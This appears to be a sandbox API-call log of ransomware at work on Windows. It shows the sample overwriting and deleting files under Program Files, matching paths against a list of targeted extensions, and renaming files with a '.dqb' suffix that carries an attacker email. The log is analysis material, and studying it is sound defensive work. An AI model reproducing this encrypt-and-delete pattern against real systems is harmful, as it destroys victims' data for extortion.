[0046.691] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.691] WriteFile (in: hFile=0x1f8, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0046.691] SetEndOfFile (hFile=0x1f8) returned 1 [0046.691] CloseHandle (hObject=0x1f8) returned 1 [0046.691] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.691] SetEndOfFile (hFile=0x228) returned 1 [0046.695] CloseHandle (hObject=0x228) returned 1 [0046.695] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0046.695] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm")) returned 1 [0046.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0046.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0046.695] lstrlenW (lpString=".doc") returned 4 [0046.695] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0046.695] lstrlenW (lpString=".docx") returned 5 [0046.695] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0046.695] lstrlenW (lpString=".pdf") returned 4 [0046.695] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0046.695] lstrlenW (lpString=".xls") returned 4 [0046.695] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0046.695] lstrlenW (lpString=".xlsx") returned 5 [0046.695] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0046.695] lstrlenW (lpString=".ppt") returned 4 [0046.695] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0046.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0046.696] lstrlenW (lpString=".zip") returned 4 [0046.696] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0046.696] lstrlenW (lpString=".rar") returned 4 [0046.696] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0046.696] lstrlenW (lpString=".bz2") returned 4 [0046.696] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0046.696] lstrlenW (lpString=".7z") returned 3 [0046.696] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0046.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0046.696] lstrlenW (lpString=".dbf") returned 4 [0046.696] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0046.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0046.696] lstrlenW (lpString=".1cd") returned 4 [0046.696] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0046.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0046.696] lstrlenW (lpString=".jpg") returned 4 [0046.696] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0046.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0046.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0046.696] lstrlenW (lpString=".doc") returned 4 [0046.696] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0046.696] lstrlenW (lpString=".docx") returned 5 [0046.696] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0046.696] lstrlenW (lpString=".pdf") returned 4 [0046.696] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0046.696] lstrlenW (lpString=".xls") returned 4 [0046.696] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0046.696] lstrlenW (lpString=".xlsx") returned 5 [0046.696] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0046.696] lstrlenW (lpString=".ppt") returned 4 [0046.696] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0046.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0046.696] lstrlenW (lpString=".zip") returned 4 [0046.697] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0046.697] lstrlenW (lpString=".rar") returned 4 [0046.697] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0046.697] lstrlenW (lpString=".bz2") returned 4 [0046.697] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0046.697] lstrlenW (lpString=".7z") returned 3 [0046.697] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0046.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0046.697] lstrlenW (lpString=".dbf") returned 4 [0046.697] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0046.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0046.697] lstrlenW (lpString=".1cd") returned 4 [0046.697] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0046.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0046.697] lstrlenW (lpString=".jpg") returned 4 [0046.697] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0046.697] lstrcmpiW (lpString1=".inc", lpString2=".dqb") returned 1 [0046.697] lstrlenW (lpString="oledbvbs.inc") returned 12 [0046.697] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0047.147] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=9975) returned 1 [0047.148] CloseHandle (hObject=0x1dc) returned 1 [0047.148] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc")) returned 0x20 [0047.148] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0047.148] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0047.148] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0047.148] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0047.148] lstrlenW (lpString=".doc") returned 4 [0047.148] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0047.148] lstrlenW (lpString=".docx") returned 5 [0047.148] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0047.148] lstrlenW (lpString=".pdf") returned 4 [0047.148] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0047.148] lstrlenW (lpString=".xls") returned 4 [0047.148] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0047.148] lstrlenW (lpString=".xlsx") returned 5 [0047.148] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0047.148] lstrlenW (lpString=".ppt") returned 4 [0047.148] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0047.148] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0047.148] lstrlenW (lpString=".zip") returned 4 [0047.148] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0047.148] lstrlenW (lpString=".rar") returned 4 [0047.148] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0047.148] lstrlenW (lpString=".bz2") returned 4 [0047.148] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0047.148] lstrlenW (lpString=".7z") returned 3 [0047.148] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0047.149] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0047.149] lstrlenW (lpString=".dbf") returned 4 [0047.149] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0047.149] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0047.149] lstrlenW (lpString=".1cd") returned 4 [0047.149] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0047.149] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0047.149] lstrlenW (lpString=".jpg") returned 4 [0047.149] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0047.149] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0047.149] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0047.149] lstrlenW (lpString=".doc") returned 4 [0047.149] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0047.149] lstrlenW (lpString=".docx") returned 5 [0047.149] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0047.149] lstrlenW (lpString=".pdf") returned 4 [0047.149] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0047.149] lstrlenW (lpString=".xls") returned 4 [0047.149] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0047.149] lstrlenW (lpString=".xlsx") returned 5 [0047.149] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0047.149] lstrlenW (lpString=".ppt") returned 4 [0047.149] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0047.149] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0047.149] lstrlenW (lpString=".zip") returned 4 [0047.149] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0047.149] lstrlenW (lpString=".rar") returned 4 [0047.149] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0047.149] lstrlenW (lpString=".bz2") returned 4 [0047.149] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0047.149] lstrlenW (lpString=".7z") returned 3 [0047.149] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0047.149] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0047.149] lstrlenW (lpString=".dbf") returned 4 [0047.150] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0047.150] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0047.150] lstrlenW (lpString=".1cd") returned 4 [0047.150] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0047.150] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0047.150] lstrlenW (lpString=".jpg") returned 4 [0047.150] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0047.150] lstrcmpiW (lpString1=".png", lpString2=".dqb") returned 1 [0047.150] lstrlenW (lpString="layers.png") returned 10 [0047.150] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\layers.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0047.595] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=24557) returned 1 [0047.600] CloseHandle (hObject=0x160) returned 1 [0047.600] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\layers.png")) returned 0x20 [0047.607] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\layers.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0047.607] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\layers.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0047.618] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png") returned 68 [0047.682] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png") returned 68 [0047.683] lstrlenW (lpString=".doc") returned 4 [0047.683] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0047.683] lstrlenW (lpString=".docx") returned 5 [0047.684] lstrcmpiW (lpString1=".docx", lpString2="s.png") returned -1 [0047.702] lstrlenW (lpString=".pdf") returned 4 [0047.703] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0047.703] lstrlenW (lpString=".xls") returned 4 [0047.703] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0047.703] lstrlenW (lpString=".xlsx") returned 5 [0047.703] lstrcmpiW (lpString1=".xlsx", lpString2="s.png") returned -1 [0047.704] lstrlenW (lpString=".ppt") returned 4 [0047.707] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0047.708] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png") returned 68 [0047.708] lstrlenW (lpString=".zip") returned 4 [0047.709] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0047.709] lstrlenW (lpString=".rar") returned 4 [0047.712] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0047.713] lstrlenW (lpString=".bz2") returned 4 [0047.714] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0047.719] lstrlenW (lpString=".7z") returned 3 [0047.719] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0047.720] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png") returned 68 [0047.720] lstrlenW (lpString=".dbf") returned 4 [0047.721] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0047.721] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png") returned 68 [0047.721] lstrlenW (lpString=".1cd") returned 4 [0047.722] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0047.725] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png") returned 68 [0047.726] lstrlenW (lpString=".jpg") returned 4 [0047.726] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0047.727] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png") returned 68 [0047.734] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png") returned 68 [0047.735] lstrlenW (lpString=".doc") returned 4 [0047.735] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0047.735] lstrlenW (lpString=".docx") returned 5 [0047.735] lstrcmpiW (lpString1=".docx", lpString2="s.png") returned -1 [0047.736] lstrlenW (lpString=".pdf") returned 4 [0047.744] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0047.745] lstrlenW (lpString=".xls") returned 4 [0047.745] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0047.746] lstrlenW (lpString=".xlsx") returned 5 [0047.748] lstrcmpiW (lpString1=".xlsx", lpString2="s.png") returned -1 [0047.763] lstrlenW (lpString=".ppt") returned 4 [0047.764] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0047.765] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png") returned 68 [0047.765] lstrlenW (lpString=".zip") returned 4 [0047.766] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0047.786] lstrlenW (lpString=".rar") returned 4 [0047.787] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0047.787] lstrlenW (lpString=".bz2") returned 4 [0047.787] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0047.787] lstrlenW (lpString=".7z") returned 3 [0047.787] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0047.788] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png") returned 68 [0047.788] lstrlenW (lpString=".dbf") returned 4 [0047.788] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0047.788] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png") returned 68 [0047.788] lstrlenW (lpString=".1cd") returned 4 [0047.788] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0047.788] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png") returned 68 [0047.788] lstrlenW (lpString=".jpg") returned 4 [0047.788] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0047.788] lstrcmpiW (lpString1=".png", lpString2=".dqb") returned 1 [0047.788] lstrlenW (lpString="PreviousMenuButtonIcon.png") returned 26 [0047.788] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\previousmenubuttonicon.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0048.256] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=4503) returned 1 [0048.256] CloseHandle (hObject=0x168) returned 1 [0048.256] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\previousmenubuttonicon.png")) returned 0x20 [0048.256] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\previousmenubuttonicon.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0048.256] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\previousmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0048.256] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png") returned 82 [0048.256] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png") returned 82 [0048.256] lstrlenW (lpString=".doc") returned 4 [0048.256] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0048.256] lstrlenW (lpString=".docx") returned 5 [0048.256] lstrcmpiW (lpString1=".docx", lpString2="n.png") returned -1 [0048.256] lstrlenW (lpString=".pdf") returned 4 [0048.256] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0048.256] lstrlenW (lpString=".xls") returned 4 [0048.256] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0048.256] lstrlenW (lpString=".xlsx") returned 5 [0048.256] lstrcmpiW (lpString1=".xlsx", lpString2="n.png") returned -1 [0048.256] lstrlenW (lpString=".ppt") returned 4 [0048.256] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0048.256] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png") returned 82 [0048.256] lstrlenW (lpString=".zip") returned 4 [0048.257] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0048.257] lstrlenW (lpString=".rar") returned 4 [0048.257] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0048.257] lstrlenW (lpString=".bz2") returned 4 [0048.257] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0048.257] lstrlenW (lpString=".7z") returned 3 [0048.257] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0048.257] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png") returned 82 [0048.257] lstrlenW (lpString=".dbf") returned 4 [0048.257] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0048.257] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png") returned 82 [0048.257] lstrlenW (lpString=".1cd") returned 4 [0048.257] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0048.257] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png") returned 82 [0048.257] lstrlenW (lpString=".jpg") returned 4 [0048.257] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0048.257] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png") returned 82 [0048.257] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png") returned 82 [0048.257] lstrlenW (lpString=".doc") returned 4 [0048.257] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0048.257] lstrlenW (lpString=".docx") returned 5 [0048.257] lstrcmpiW (lpString1=".docx", lpString2="n.png") returned -1 [0048.257] lstrlenW (lpString=".pdf") returned 4 [0048.257] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0048.257] lstrlenW (lpString=".xls") returned 4 [0048.257] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0048.257] lstrlenW (lpString=".xlsx") returned 5 [0048.257] lstrcmpiW (lpString1=".xlsx", lpString2="n.png") returned -1 [0048.257] lstrlenW (lpString=".ppt") returned 4 [0048.257] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0048.257] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png") returned 82 [0048.257] lstrlenW (lpString=".zip") returned 4 [0048.257] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0048.257] lstrlenW (lpString=".rar") returned 4 [0048.258] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0048.258] lstrlenW (lpString=".bz2") returned 4 [0048.258] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0048.258] lstrlenW (lpString=".7z") returned 3 [0048.258] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0048.258] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png") returned 82 [0048.258] lstrlenW (lpString=".dbf") returned 4 [0048.258] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0048.258] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png") returned 82 [0048.258] lstrlenW (lpString=".1cd") returned 4 [0048.258] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0048.258] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png") returned 82 [0048.258] lstrlenW (lpString=".jpg") returned 4 [0048.258] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0048.258] lstrcmpiW (lpString1=".wmv", lpString2=".dqb") returned 1 [0048.258] lstrlenW (lpString="Notes_LOOP_BG_PAL.wmv") returned 21 [0048.258] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_loop_bg_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0048.408] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=869322) returned 1 [0048.408] CloseHandle (hObject=0x174) returned 1 [0048.408] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_loop_bg_pal.wmv")) returned 0x20 [0048.408] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_loop_bg_pal.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0048.408] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_loop_bg_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0048.408] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv") returned 70 [0048.408] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv") returned 70 [0048.408] lstrlenW (lpString=".doc") returned 4 [0048.408] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0048.408] lstrlenW (lpString=".docx") returned 5 [0048.408] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0048.409] lstrlenW (lpString=".pdf") returned 4 [0048.409] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0048.409] lstrlenW (lpString=".xls") returned 4 [0048.409] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0048.409] lstrlenW (lpString=".xlsx") returned 5 [0048.409] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0048.409] lstrlenW (lpString=".ppt") returned 4 [0048.409] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0048.409] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv") returned 70 [0048.409] lstrlenW (lpString=".zip") returned 4 [0048.409] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 